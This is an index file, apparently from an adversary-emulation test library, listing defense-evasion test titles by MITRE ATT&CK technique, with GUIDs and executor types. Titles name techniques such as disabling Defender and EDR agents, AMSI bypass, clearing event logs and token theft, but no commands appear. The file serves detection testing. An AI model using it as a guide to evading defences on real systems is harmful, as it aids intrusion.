defense-evasion,T1112,Modify Registry,33,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
defense-evasion,T1112,Modify Registry,34,Windows Add Registry Value to Load Service in Safe Mode without Network,1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5,command_prompt
defense-evasion,T1112,Modify Registry,35,Windows Add Registry Value to Load Service in Safe Mode with Network,c173c948-65e5-499c-afbe-433722ed5bd4,command_prompt
defense-evasion,T1112,Modify Registry,36,Disable Windows Toast Notifications,003f466a-6010-4b15-803a-cbb478a314d7,command_prompt
defense-evasion,T1112,Modify Registry,37,Disable Windows Security Center Notifications,45914594-8df6-4ea9-b3cc-7eb9321a807e,command_prompt
defense-evasion,T1112,Modify Registry,38,Suppress Win Defender Notifications,c30dada3-7777-4590-b970-dc890b8cf113,command_prompt
defense-evasion,T1112,Modify Registry,39,Allow RDP Remote Assistance Feature,86677d0e-0b5e-4a2b-b302-454175f9aa9e,command_prompt
defense-evasion,T1112,Modify Registry,40,NetWire RAT Registry Key Creation,65704cd4-6e36-4b90-b6c1-dc29a82c8e56,command_prompt
defense-evasion,T1112,Modify Registry,41,Ursnif Malware Registry Key Creation,c375558d-7c25-45e9-bd64-7b23a97c1db0,command_prompt
defense-evasion,T1112,Modify Registry,42,Terminal Server Client Connection History Cleared,3448824b-3c35-4a9e-a8f5-f887f68bea21,command_prompt
defense-evasion,T1112,Modify Registry,43,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
defense-evasion,T1112,Modify Registry,44,DisallowRun Execution Of Certain Applications,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
defense-evasion,T1112,Modify Registry,45,Enabling Restricted Admin Mode via Command_Prompt,fe7974e5-5813-477b-a7bd-311d4f535e83,command_prompt
defense-evasion,T1112,Modify Registry,46,Mimic Ransomware - Enable Multiple User Sessions,39f1f378-ba8a-42b3-96dc-2a6540cfc1e3,command_prompt
defense-evasion,T1112,Modify Registry,47,Mimic Ransomware - Allow Multiple RDP Sessions per User,35727d9e-7a7f-4d0c-a259-dc3906d6e8b9,command_prompt
defense-evasion,T1112,Modify Registry,48,Event Viewer Registry Modification - Redirection URL,6174be7f-5153-4afd-92c5-e0c3b7cdb5ae,command_prompt
defense-evasion,T1112,Modify Registry,49,Event Viewer Registry Modification - Redirection Program,81483501-b8a5-4225-8b32-52128e2f69db,command_prompt
defense-evasion,T1112,Modify Registry,50,Enabling Remote Desktop Protocol via Remote Registry,e3ad8e83-3089-49ff-817f-e52f8c948090,command_prompt
defense-evasion,T1112,Modify Registry,51,Disable Win Defender Notification,12e03af7-79f9-4f95-af48-d3f12f28a260,command_prompt
defense-evasion,T1112,Modify Registry,52,Disable Windows OS Auto Update,01b20ca8-c7a3-4d86-af59-059f15ed5474,command_prompt
defense-evasion,T1112,Modify Registry,53,Disable Windows Auto Reboot for current logon user,396f997b-c5f8-4a96-bb2c-3c8795cf459d,command_prompt
defense-evasion,T1112,Modify Registry,54,Windows Auto Update Option to Notify before download,335a6b15-b8d2-4a3f-a973-ad69aa2620d7,command_prompt
defense-evasion,T1112,Modify Registry,55,Do Not Connect To Win Update,d1de3767-99c2-4c6c-8c5a-4ba4586474c8,command_prompt
defense-evasion,T1112,Modify Registry,56,Tamper Win Defender Protection,3b625eaa-c10d-4635-af96-3eae7d2a2f3c,command_prompt
defense-evasion,T1112,Modify Registry,57,Snake Malware Registry Blob,8318ad20-0488-4a64-98f4-72525a012f6b,powershell
defense-evasion,T1112,Modify Registry,58,Allow Simultaneous Download Registry,37950714-e923-4f92-8c7c-51e4b6fffbf6,command_prompt
defense-evasion,T1112,Modify Registry,59,Modify Internet Zone Protocol Defaults in Current User Registry - cmd,c88ef166-50fa-40d5-a80c-e2b87d4180f7,command_prompt
defense-evasion,T1112,Modify Registry,60,Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell,b1a4d687-ba52-4057-81ab-757c3dc0d3b5,powershell
defense-evasion,T1112,Modify Registry,61,Activities To Disable Secondary Authentication Detected By Modified Registry Value.,c26fb85a-fa50-4fab-a64a-c51f5dc538d5,command_prompt
defense-evasion,T1112,Modify Registry,62,Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.,ffeddced-bb9f-49c6-97f0-3d07a509bf94,command_prompt
defense-evasion,T1112,Modify Registry,63,Scarab Ransomware Defense Evasion Activities,ca8ba39c-3c5a-459f-8e15-280aec65a910,command_prompt
defense-evasion,T1112,Modify Registry,64,Disable Remote Desktop Anti-Alias Setting Through Registry,61d35188-f113-4334-8245-8c6556d43909,command_prompt
defense-evasion,T1112,Modify Registry,65,Disable Remote Desktop Security Settings Through Registry,4b81bcfa-fb0a-45e9-90c2-e3efe5160140,command_prompt
defense-evasion,T1112,Modify Registry,66,Disabling ShowUI Settings of Windows Error Reporting (WER),09147b61-40f6-4b2a-b6fb-9e73a3437c96,command_prompt
defense-evasion,T1112,Modify Registry,67,Enable Proxy Settings,eb0ba433-63e5-4a8c-a9f0-27c4192e1336,command_prompt
defense-evasion,T1112,Modify Registry,68,Set-Up Proxy Server,d88a3d3b-d016-4939-a745-03638aafd21b,command_prompt
defense-evasion,T1112,Modify Registry,69,RDP Authentication Level Override,7e7b62e9-5f83-477d-8935-48600f38a3c6,command_prompt
defense-evasion,T1112,Modify Registry,70,Enable RDP via Registry (fDenyTSConnections),16bdbe52-371c-4ccf-b708-79fba61f1db4,command_prompt
defense-evasion,T1112,Modify Registry,71,Disable Windows Prefetch Through Registry,7979dd41-2045-48b2-a54e-b1bc2415c9da,command_prompt
defense-evasion,T1112,Modify Registry,72,Setting Shadow key in Registry for RDP Shadowing,ac494fe5-81a4-4897-af42-e774cf005ecb,powershell
defense-evasion,T1112,Modify Registry,73,Flush Shimcache,ecbd533e-b45d-4239-aeff-b857c6f6d68b,command_prompt
defense-evasion,T1112,Modify Registry,74,Disable Windows Remote Desktop Protocol,5f8e36de-37ca-455e-b054-a2584f043c06,command_prompt
defense-evasion,T1112,Modify Registry,75,Enforce Smart Card Authentication Through Registry,4c4bf587-fe7f-448f-ba8d-1ecec9db88be,command_prompt
defense-evasion,T1112,Modify Registry,76,Requires the BitLocker PIN for Pre-boot authentication,26fc7375-a551-4336-90d7-3f2817564304,command_prompt
defense-evasion,T1112,Modify Registry,77,Modify EnableBDEWithNoTPM Registry entry,bacb3e73-8161-43a9-8204-a69fe0e4b482,command_prompt
defense-evasion,T1112,Modify Registry,78,Modify UseTPM Registry entry,7c8c7bd8-0a5c-4514-a6a3-0814c5a98cf0,command_prompt
defense-evasion,T1112,Modify Registry,79,Modify UseTPMPIN Registry entry,10b33fb0-c58b-44cd-8599-b6da5ad6384c,command_prompt
defense-evasion,T1112,Modify Registry,80,Modify UseTPMKey Registry entry,c8480c83-a932-446e-a919-06a1fd1e512a,command_prompt
defense-evasion,T1112,Modify Registry,81,Modify UseTPMKeyPIN Registry entry,02d8b9f7-1a51-4011-8901-2d55cca667f9,command_prompt
defense-evasion,T1112,Modify Registry,82,Modify EnableNonTPM Registry entry,e672a340-a933-447c-954c-d68db38a09b1,command_prompt
defense-evasion,T1112,Modify Registry,83,Modify UsePartialEncryptionKey Registry entry,b5169fd5-85c8-4b2c-a9b6-64cc0b9febef,command_prompt
defense-evasion,T1112,Modify Registry,84,Modify UsePIN Registry entry,3ac0b30f-532f-43c6-8f01-fb657aaed7e4,command_prompt
defense-evasion,T1112,Modify Registry,85,Abusing Windows TelemetryController Registry Key for Persistence,4469192c-2d2d-4a3a-9758-1f31d937a92b,command_prompt
defense-evasion,T1112,Modify Registry,86,Modify RDP-Tcp Initial Program Registry Entry,c691cee2-8d17-4395-b22f-00644c7f1c2d,command_prompt
defense-evasion,T1112,Modify Registry,87,Abusing MyComputer Disk Cleanup Path for Persistence,f2915249-4485-42e2-96b7-9bf34328d497,command_prompt
defense-evasion,T1112,Modify Registry,88,Abusing MyComputer Disk Fragmentation Path for Persistence,3235aafe-b49d-451b-a1f1-d979fa65ddaf,command_prompt
defense-evasion,T1112,Modify Registry,89,Abusing MyComputer Disk Backup Path for Persistence,599f3b5c-0323-44ed-bb63-4551623bf675,command_prompt
defense-evasion,T1112,Modify Registry,90,Adding custom paths for application execution,573d15da-c34e-4c59-a7d2-18f20d92dfa3,command_prompt
defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad Binary to Change Hash using truncate command - Linux/macOS,e22a9e89-69c7-410f-a473-e6c212cd2292,sh
defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
defense-evasion,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
defense-evasion,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,sh
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
defense-evasion,T1070.001,Indicator Removal on Host: Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
defense-evasion,T1070.001,Indicator Removal on Host: Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLog,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
defense-evasion,T1070.001,Indicator Removal on Host: Clear Windows Event Logs,3,Clear Event Logs via VBA,1b682d84-f075-4f93-9a89-8a8de19ffd6e,powershell
defense-evasion,T1222,File and Directory Permissions Modification,1,Enable Local and Remote Symbolic Links via fsutil,6c4ac96f-d4fa-44f4-83ca-56d8f4a55c02,command_prompt
defense-evasion,T1222,File and Directory Permissions Modification,2,Enable Local and Remote Symbolic Links via reg.exe,78bef0d4-57fb-417d-a67a-b75ae02ea3ab,command_prompt
defense-evasion,T1222,File and Directory Permissions Modification,3,Enable Local and Remote Symbolic Links via Powershell,6cd715aa-20ac-4be1-a8f1-dda7bae160bd,powershell
defense-evasion,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
defense-evasion,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique,ccf4ac39-ec93-42be-9035-90e2f26bcd92,powershell
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Make and modify binary from C source (freebsd),dd580455-d84b-481b-b8b0-ac96f3b1dc4c,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Set a SetUID flag on file (freebsd),9be9b827-ff47-4e1b-bef8-217db6fb7283,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Set a SetGID flag on file (freebsd),1f73af33-62a8-4bf1-bd10-3bea931f2c0d,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,8,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,9,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,10,Do reconnaissance for files that have the setgid bit set,3fb46e17-f337-4c14-9f9a-a471946533e2,sh
defense-evasion,T1218.008,Signed Binary Proxy Execution: Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
defense-evasion,T1218.008,Signed Binary Proxy Execution: Odbcconf,2,Odbcconf.exe - Load Response File,331ce274-f9c9-440b-9f8c-a1006e1fce0b,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,2,Auditing Configuration Changes on FreeBSD Host,cedaf7e7-28ee-42ab-ba13-456abd35d1bd,sh
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,3,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,4,Logging Configuration Changes on FreeBSD Host,6b8ca3ab-5980-4321-80c3-bcd77c8daed8,sh
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,5,Disable Powershell ETW Provider - Windows,6f118276-121d-4c09-bb58-a8fb4a72ee84,powershell
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,6,Disable .NET Event Tracing for Windows Via Registry (cmd),8a4c33be-a0d3-434a-bee6-315405edbd5b,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,7,Disable .NET Event Tracing for Windows Via Registry (powershell),19c07a45-452d-4620-90ed-4c34fffbe758,powershell
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,8,LockBit Black - Disable the ETW Provider of Windows Defender -cmd,f6df0b8e-2c83-44c7-ba5e-0fa4386bec41,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,9,LockBit Black - Disable the ETW Provider of Windows Defender -Powershell,69fc085b-5444-4879-8002-b24c8e1a3e02,powershell
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,10,Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd,fdac1f79-b833-4bab-b4a1-11b1ed676a4b,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,11,Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell,b42c1f8c-399b-47ae-8fd8-763181395fee,powershell
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,12,Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd,110b4281-43fe-405f-a184-5d8eaf228ebf,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,13,Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell,4d61779d-be7f-425c-b560-0cafb2522911,powershell
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,14,Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table,1174b5df-2c33-490f-8854-f5eb80c907ca,powershell
defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
defense-evasion,T1070,Indicator Removal on Host,2,Indicator Manipulation using FSUtil,96e86706-6afd-45b6-95d6-108d23eaf2e9,powershell
defense-evasion,T1550.003,Use Alternate Authentication Material: Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
defense-evasion,T1550.003,Use Alternate Authentication Material: Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,3,linux rename /proc/pid/comm using prctl,f0e3aaea-5cd9-4db6-a077-631dd19b27a8,sh
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,4,Hiding a malicious process with bind mounts,ad4b73c2-d6e2-4d8b-9868-4c6f55906e01,sh
defense-evasion,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
defense-evasion,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
defense-evasion,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
defense-evasion,T1647,Plist File Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,3,Remove the Zone.Identifier alternate data stream,64b12afc-18b8-4d3f-9eab-7f6cae7c73f9,powershell
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,4,Execute LNK file from ISO,c2587b8d-743d-4985-aa50-c83394eaeb68,powershell
defense-evasion,T1612,Build Image on Host,1,Build Image On Host,2db30061-589d-409b-b125-7b473944f9b3,sh
defense-evasion,T1055.002,Process Injection: Portable Executable Injection,1,Portable Executable Injection,578025d5-faa9-4f6d-8390-aae739d503e1,powershell
defense-evasion,T1562.010,Impair Defenses: Downgrade Attack,1,ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI,062f92c9-28b1-4391-a5f8-9d8ca6852091,powershell
defense-evasion,T1562.010,Impair Defenses: Downgrade Attack,2,ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI,14d55b96-b2f5-428d-8fed-49dc4d9dd616,command_prompt
defense-evasion,T1562.010,Impair Defenses: Downgrade Attack,3,PowerShell Version 2 Downgrade,47c96489-2f55-4774-a6df-39faff428f6f,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,4,Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement,007e5672-2088-4853-a562-7490ddc19447,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,5,Invoke HTML Application - Jscript Engine Simulating Double Click,58a193ec-131b-404e-b1ca-b35cf0b18c33,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,6,Invoke HTML Application - Direct download from URI,39ceed55-f653-48ac-bd19-aceceaf525db,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,5,Juicy Potato,f095e373-b936-4eb4-8d22-f47ccbfbe64a,powershell
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,3,Create Hidden User in Registry,173126b7-afe4-45eb-8680-fa9f6400431c,command_prompt
defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,2,Disable history collection (freebsd),cada55b4-8251-4c60-819e-8ec1b33c9306,sh
defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,4,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,5,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,6,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,7,Setting the HISTSIZE environment variable,386d3850-2ce7-4508-b56b-c0558922c814,sh
defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,8,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,9,Setting the HISTFILE environment variable (freebsd),f7308845-6da8-468e-99f2-4271f2f5bb67,sh
defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,10,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,11,Disable Windows Command Line Auditing using reg.exe,1329d5ab-e10e-4e5e-93d1-4d907eb656e5,command_prompt
defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,12,Disable Windows Command Line Auditing using Powershell Cmdlet,95f5c72f-6dfe-45f3-a8c1-d8faa07176fa,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,2,Compiled HTML Help Remote Payload,0f8af516-9818-4172-922b-42986ef1e81d,command_prompt
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,3,Invoke CHM with default Shortcut Command Execution,29d6f0d7-be63-4482-8827-ea77126c1ef7,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,4,Invoke CHM with InfoTech Storage Protocol Handler,b4094750-5fc7-4e8e-af12-b4e36bf5e7f6,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,5,Invoke CHM Simulate Double click,5decef42-92b8-4a93-9eb2-877ddcb9401a,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,6,Invoke CHM with Script Engine and Help Topic,4f83adda-f5ec-406d-b318-9773c9ca92e5,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,7,Invoke CHM Shortcut Command with ITS and Help Topic,15756147-7470-4a83-87fb-bb5662526247,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,8,Decompile Local CHM File,20cb05e0-1fa5-406d-92c1-84da4ba01813,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,1,Add Network Share,14c38f32-6509-46d8-ab43-d53e32d2b131,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,2,Remove Network Share,09210ad5-1ef2-4077-9ad3-7351e13e9222,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,3,Remove Network Share PowerShell,0512d214-9512-4d22-bde7-f37e058259b3,powershell
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,4,Disable Administrative Share Creation at Startup,99c657aa-ebeb-4179-a665-69288fdd12b8,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,5,Remove Administrative Shares,4299eff5-90f1-4446-b2f3-7f4f5cfd5d62,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,2,Disable syslog (freebsd),db9de996-441e-4ae0-947b-61b6871e2fdf,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,3,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,4,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,5,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,6,Disable Carbon Black Response,8fba7766-2d11-4b4a-979a-1e3d9cc9a88c,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,7,Disable LittleSnitch,62155dd8-bb3d-4f32-b31c-6532ff3ac6a3,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,8,Disable OpenDNS Umbrella,07f43b33-1e15-4e99-be70-bc094157c849,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,9,Disable macOS Gatekeeper,2a821573-fb3f-4e71-92c3-daac7432f053,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,10,Stop and unload Crowdstrike Falcon on macOS,b3e7510c-2d4c-4249-a33f-591a2bc83eef,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,11,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,12,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,13,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,14,AMSI Bypass - Remove AMSI Provider Reg Key,13f09b91-c953-438e-845b-b585e51cac9b,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,15,Disable Arbitrary Security Windows Service,a1230893-56ac-4c81-b644-2108e982f8f5,command_prompt
